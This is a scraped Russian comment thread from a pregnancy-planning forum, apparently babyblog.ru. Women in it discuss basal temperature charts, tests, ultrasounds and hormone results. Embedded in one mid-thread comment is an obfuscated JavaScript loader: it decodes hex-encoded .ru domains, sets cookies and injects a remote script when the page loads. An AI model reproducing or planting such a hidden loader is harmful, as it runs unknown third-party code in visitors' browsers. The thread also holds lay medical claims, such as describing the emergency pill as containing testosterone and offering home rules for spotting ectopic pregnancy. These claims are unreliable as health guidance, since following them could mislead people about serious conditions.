Мой график базальной t°, цикл от 24 августа 2015

У маня в этом цикле такая же история! Как у тебя дела? Тест делала?
21.09.2015
Наташа, тест не делала , но сегодня темп упала , началась мазня, наверное пролет , пришли раньше на день , или овуляция была раньше, а у тебя какой день? Как самочувствие? Выложи свой график в тему графики
21.09.2015
У меня только 7ДПО еще рано его выкладывать. У меня обычно бт во второй фазе 37-37.3, а в этот раз как-то странно36.8-36.9 и 1 раз 37, завтра собираюсь пойти на прогик сдать может, что прояснит (уже сегодня и новый градусник купила). Грудь уже дня 3-4 побаливает, а сегодня усилилась боль и ТТ 37.4 поднялась, вообщем как-то так не понятно!
21.09.2015
Наташа , привет, как у тебя дела , температура не спала ?
25.09.2015
Привет! Держится 37-37.1 разница между фазами 0.5, правда вчера была 37.4, но я ее не учитывала перенервничала накануне, ну и с девочками стресс снимали пивом((. Вчера делала эвик, была слабенькая-слабенькая полосочка (можешь посмотреть http://www.babyblog.ru/community/post/kopilkatestov/1846483 ), а сегодня вроде пусто, ну или такая же как вчера. Хотела сегодня на ХГЧ, ибо в понедельник днюха. А у тебя как дела?
25.09.2015
Наташа , я рада что у тебя получилось , 💐 , как же здорово увидеть хоть призрачную полосочку , у меня на 12 день темп 36.8 и так ещё два дня держалась , пошли дела , так что снова в бой в этом цикле , Наташа, вышли мне пожалуйста свой персональный чих заразный , заразный , тебе желаю лёгкой беременности издорового малыша !!!!!!!!!!!!!!!!!!!!!!!!!
25.09.2015
А вот я думаю, что у меня очередной пролет (у меня дурацкий полип в матке 3мм, вылез гад после операции на щитовидке), думала что в понедельник сдам срочный ХГЧ, но сейчас почитала, что можно сдать если не есть 3-6 ч до сдачи, вот и решила с 9-00ч не есть и сдать сегодня, чтоб меньше мучатся! Если ХГЧ подтвердить, Я ТЕБЯ ТАК ЗАЧИХАЮ!!!!
25.09.2015
Наташа, привет , приехала с дачи , смотрю , а тут такое !!!, не переживай , все будет , я верю в удачу, наверное , просто наши малыши пока ещё нас не выбрали , надо продолжать , а что врачи говорят про полис , как его обнаружили и что это такое ?
26.09.2015
Привет! Ну начну с того, что 25.09 сдала ХГЧ - отрицательно, а в день сдачи БТ 37.0 вчера 37.1, а сегодня 37.4 хотя уже должна упасть, странно как-то! В начале июня сделала операцию на щитовидке, а в июле пошла сделала узи (я каждые полгода делаю узи для себя и никогда ничего не было) врачи говорят пока не трогать, типа он маленький, а появился гад после операции, видимо был гормональный сбой, хотя у меня с гормонами до операции все было отлично и функции щитовидки не нарушены, а сделали операцию просто потому, что узел мешал дышать и чуть выпирал. Ну подожду до завтра и сделаю тест! Сначала расстроилась, а сейчас уже нормально. Я сегодня когда измеряла БТ приснула и мне приснилось, что я нашла икону Михаила, интересно к чему!
27.09.2015
Наташа, ну такая температура странная , может прикрепление позднее , вот хгч и не распознает ? Я тебе свою историю расскажу , мне было 22 года , встречалась с парнем , однажды он не успел , и я думая о нежелательной беременности выпила таблетку пастинора от беременности , а оказалось опаздала , я в то время и за циклом не следила , в общем мама мне тогда говорит ,а где твои дела ? Я ей отвечаю не переживай придут , я не беременна , ещё через неделю купила тест в аптеке и сделала , там была слабенькая , считай под лупой полосочка, едем в платный центр ,делаем УЗИ , беременности нет, сдаем кровь , там ноль, сдаем мочу опять ноль , у меня начинается мазня коричневая , и все думают что дела пришли , ещё через день мазня тёмно коричневая не переходит в дела , аппетит странный , целую пиццу помню за раз на вернула , ещё через неделю раздулся живот , от боли потеряла сознание , сделали операцию по удалению внематочной , оказалось я тогда на пару дней опаздала с таблеткой , и яйцо не успело выйти из трубы в матку , я его там таблеткой с тестотероном тормазнула , вот так ,трубу мне оставили!!!!потом прошло пять лет , я работала переводчиком , встретила будущего мужа , провстречались около 6 лет , я все время предохранялась свечками , а кода поженились в октябре 2014 решили планировать , и сразу не получилось , я в марте пошла к гинекологу , рассказала все о себе , сдала гармоны ,УЗИ все ок , мнее говорят нужно проверить трубы , коль операция была , я согласилась на процедуру УЗИ гсс , это когда вливают жидкость и смотрят поступил ли раствор в брюшную полость под контролем УЗИ , результат меня убил , мне сказали , что на левую сторону и пробовать не стоит , непроходимые , а правая еле еле , но так уж и быть рискуйте на правую трубу , с апреля спала с мужем через месяц , и ревела , а потом на одном сайте начиталась что гсс УЗИ не информативна , надо сделать гсг это рентген и жидкость контраст , я в августе сделала процедуру ,где мне дали заключение что у меня две трубы абсолютно проходимы, вот сколько времениушло даром ,это был мой первый цикл после гсг , я это к чему , в 22 года все твердили беременности нет , а оказалось есть , это не важно что она тормознулась на выходе из трубы , она же была !!! А анализы не показывали !!!!может ещё рано , скажи а температура в других циклах какая была , пришли график посмотреть ,,
27.09.2015
Да вот тоже думаю, что рано сдала, а вдруг и правда б! У меня обычно и ТТ во второй фазе повышается до 37.1-37.4, а за несколько дней до м падает до 36.9-37.0. а сегодня аж знобит и мурахи по телу бегают, фиг его знает, что это такое!
27.09.2015
Буду держать за тебя кулачки , напиши мне что и как через день два , жду пока пока
27.09.2015
Обязательно напишу! Пока!
27.09.2015
Наташа,привет, как у тебя дела? У меня сегодня 9 день цикла , вчера была на УЗИ , сказала фолликул опять справа , 13 мм , жду овуляцию на 13-15 день...
29.09.2015
Привет, Викуля! Да ни как, сегодня утром начало мазать, БТ 36.9, опять пролет! В субботу пойду на узи проверю свой полип. может куда делся!
29.09.2015
Натуля , привет , ты меня расстроила , давай дальше вместе стараться , я вчера была на УЗИ , сказали овуляция в пт или СБ будет , как ты думаешь , может нужно дюфастон попить , а то температура медленно ползет ? А у тебя мазня нормального цвета , не коричневая?
29.09.2015
Привет, Викуля! Конечно будем вместе стараться, и у нас все получиться! Сама расстроилась и мой расстроился и еще сильней меня! Да, нормального цвета и со сгусткам, ну правда меньше чем всегда. А ты на какой день цикла узи делала? Для дюфастона думаю надо сначала на прогик сдать, чтоб понимать, что к чему, зачем зря пить! Я вот в этом цикле собираюсь на пролактин сдать и на прогик.
30.09.2015
Привет , Натуля! Это хорошо цвет нормальный , а прогиг на 7 дпо был 65 это норма ? Сдавала 2 месяца назад ! А ты сдай ещё ттг , картизол, фсг, лг , - они сдаются на 2-3 день цикла
30.09.2015
Прикин, так у меня сегодня с утра ничего нет, как будто закончились, что за фигня! Да вроде нормальной у тебя прогиг. ТТГ у меня в норме, я его и так сдаю у меня же 1 доли щитовидки нет и пью эутирокс. А те что за гормоны?
30.09.2015
А темп какая ,? А что дела только 1-2 дня были ? Странно !!! Фсг и лг гармоны 1 фазы , отвечают за рост фолукулов , отвечают за запас яйцеклеток , а картизол - стрессовый гармон, если завышен , скажут пить валериану
30.09.2015
Дело в том. что я ее в месячные не меряю (меряю вагинально), получается были 1 день вчера сутра и ночью сильно болел живот я выпила 2 ношпы и еле уснула. и за ночь не много, хотя так как оно болело ведро должно было быть! Сейчас проверила шейку матки, вроде закрыта и на пальце нет выделений кровяных, капец! ТТ правда 37.0. У меня яичники всегда хорошо работают и фоллики растут хорошо, всегда узистка говорит об этом! Блин, что теперь делать?
30.09.2015
Привет , Натусик , ну ты даёшь жару ,!!! Давай тест сделай , что- и на дела не похоже !!! А темп 37 прям беременная , а так дела у тебя обычно какие - ?сильные ? Не было никогда чтобы 2 дня ? А матку как определяешь?
30.09.2015
Приветик! Обычно у меня так, первый день: утром начинает мазать к обеду начинается нормально, 2 день идет нормально, на 3 - 4 мажет. А сейчас первый ка обычно, на 2 в обед мазнуло и к вечером мазнуло, за ночь чуть-чуть и утром сегодня пару капель и при всех этих каплях живот болел так сильно, что по идее должно было лить как из ведра (раньше такого не было). Г говорит, что с моим полипом должны быть более обильные чем всегда и даже может в середине цикла мазать, а у меня наоборот на уменьшение))) Вчера психонула и поперли есть суши и пить соке, так сегодня БТ 37.0, а ТТ 37.1, ну я думаю что это из-за спиртного. Тест сделала и он опять с реагентом, как-то эвики испортились! Вот теперь меня мысль о внематочной мучает, кстати у меня тесты и при беременности на недельной задержке были с бледной второй полоской Г говорит, что это может быть из-за пиелонефрита. Я всегда проверяю утром в день предполагаемых М так там как лунка приоткрыта и выделения или белые или розовые, если розовые, то в этот день начинаются.
01.10.2015
Ну ладно, подожду до узи все равно делать в субботу проверять мой поллип, там видно будет, что и как!
01.10.2015
Наташенька!!! Не думай о внематочной , при внематочной выделения коричнево чёрные такие , и в труху на пальцах превращаются ,если потереть, у меня когда была , болел живот с одной стороны , и был раздутый сильно- помню, штаны на молнию не застегивались , и сознание от боли теряла !!!! А реагент , это что , полосочка бледная? А хгч ещё раз сдавала?
01.10.2015
Сегодня опять не много с пятирублевую монету светло розовые, а сейчас уже все закончилось и утром чуть живот болел, а с обеда уже не болит. Просто ели-ели заметная полосочка. На хгч не сдавала, а на узи на понедельник записалась, так как женщина у которой делаю в субботу не работает, и в понедельник пойду на пролактин сдам может и на хгч посмотрю по бт. Сегодня еще начало тошнить сильно после того как перестал живот болеть, не ем тошнит, поем еще сильнее тошнит, короче фигня происходит со мной!
01.10.2015
Ох , Наташка! Ну чтоб ты беременная оказалась, напиши завтра , про УЗИ , ок?
02.10.2015
На УЗИ в понедельник! Обязательно отпишусь!
02.10.2015
Спасибо!
02.10.2015
Привет, Викуля! Была сегодня на узи, Б нет, все как и было, полип мой на месте, ну хоть не растет! Как у тебя дела?
05.10.2015
Привет, Натуля! Жаль, что все- таки у тебя пролет , я очень надеялась . Мы с тобой переписываемся , а кроме по женски ничего не знаем про друг друга. Напиши чуть о себе , сколько лет, есть ли ребенок , чем занимаешься? Чем увлекаешься? Я все жду овуляцию, обычно была на 14 день, фолик лопался на 24- 26 в диаметре, а тут , мало того опять справа как в прошлом цикле , так он на 16 день 18 мм, он такой уже 3 дня, тест на овуляцию показывает слабую полоску, правда сегодня днем стал немного ярче, сегодня была на узи , сказали , что слева фоликул тоже растет , но пока маленький 10 мм, вот теперь не знаю , когда овуляцию ждать , или их две будет ? Как думаешь?
05.10.2015
Напиши мне в субботу , как придешь с УЗИ , ладно?
01.10.2015
УЗИ сделала на 8 день , датчиком без гидрогеля , фолик 13 мм , сегодня 10 день , темпа 36.6 , высоковата для меня обычно уже на 36,4 снижается
30.09.2015
27.09.2015
Наташа , тут явно есть беременность , у тебя даже западение есть , с выделениями , и такая темпа высокая !!!! Жди и будет так как захочешь , не нервничай , улыбайся !!!!
27.09.2015
А выделения, просто маленькая капелька крови после секса, через часа полтора. Будем надеяться!!
27.09.2015
Вот предыдущий и настоящий, перед этими забросила графики и полгода не делала, да в старых нет смыслы, они отличаются от последних, после операции БТ стала спокойней себя вести в первой фазе. В августе мой был 2 недели в командировке, может и график ровнее из-за отсутствия секса?
27.09.2015
Пришел результат, я в пролете, ну хоть теперь не буду нервы тратить до М, как это обычно!
25.09.2015
Мой график очень на Ваш похож. БТ тоже медленно вверх ползет. Г сказала, если так на протяжении нескольких циклов будет, то сдавать на гормоны будем.[removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="10703",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
18.09.2015
Здесь нет медленного подъема - присмотритесь внимательнее. Подъем как по учебнику, за 3 дня. А вот следующая ступень подъема - явно к беременности! ;-)
18.09.2015
Снова вы меня поддерживает , спасибо , сегодня 12 день , а температура спала на 0,1 , как то так , теперь остаётся ждать мес.
19.09.2015
Беременность - это маленькое чудо, будем надеяться и верить!!!
19.09.2015
Сдавала гармоны два цикла подряд , все в норме , так что не знаю ....выставите свой график на ленту сообщества , желанных двух полосочек
19.09.2015
Как будто третья фаза пошла! 😉
17.09.2015
Касана, а что это третья фаза?
17.09.2015
При беременности - третий подъем температур.
18.09.2015
Спасибо за отзыв, сегодня тест отрицательный , я расстроена, видимо западение на два дня не должно быть
18.09.2015
рановатенько для теста ;-) и никакого западения у вас нет, просто на 20-й ДЦ на 0,1 БТ повыше, возможно просто спали беспокойно... И, поверьте, на беременном графике совсем не обязательно должно быть ИЗ! Очень красивый график! Держу за вас кулачки!!!
18.09.2015
Ой, ваши слова богу в уши , спасибо за поддержку , ещё есть надежда , 💐
18.09.2015
Все хорошо. Пусть будет //!
17.09.2015
Спасибо за поддержку, счастья вам
17.09.2015
Спасибо
17.09.2015
хороший график! а тест, мне кажется, рановато ещё делать) чтоб не огорчаться раньше времени. удачи!
17.09.2015
Спасибо за отзыв, жду и надеюсь, желаю вам исполнения заварного желания
17.09.2015
спасибо)) вам тоже!
17.09.2015
Мой график базальной t°, цикл от 22 августа 2015 Мой график базальной t°, цикл от 18 августа 2015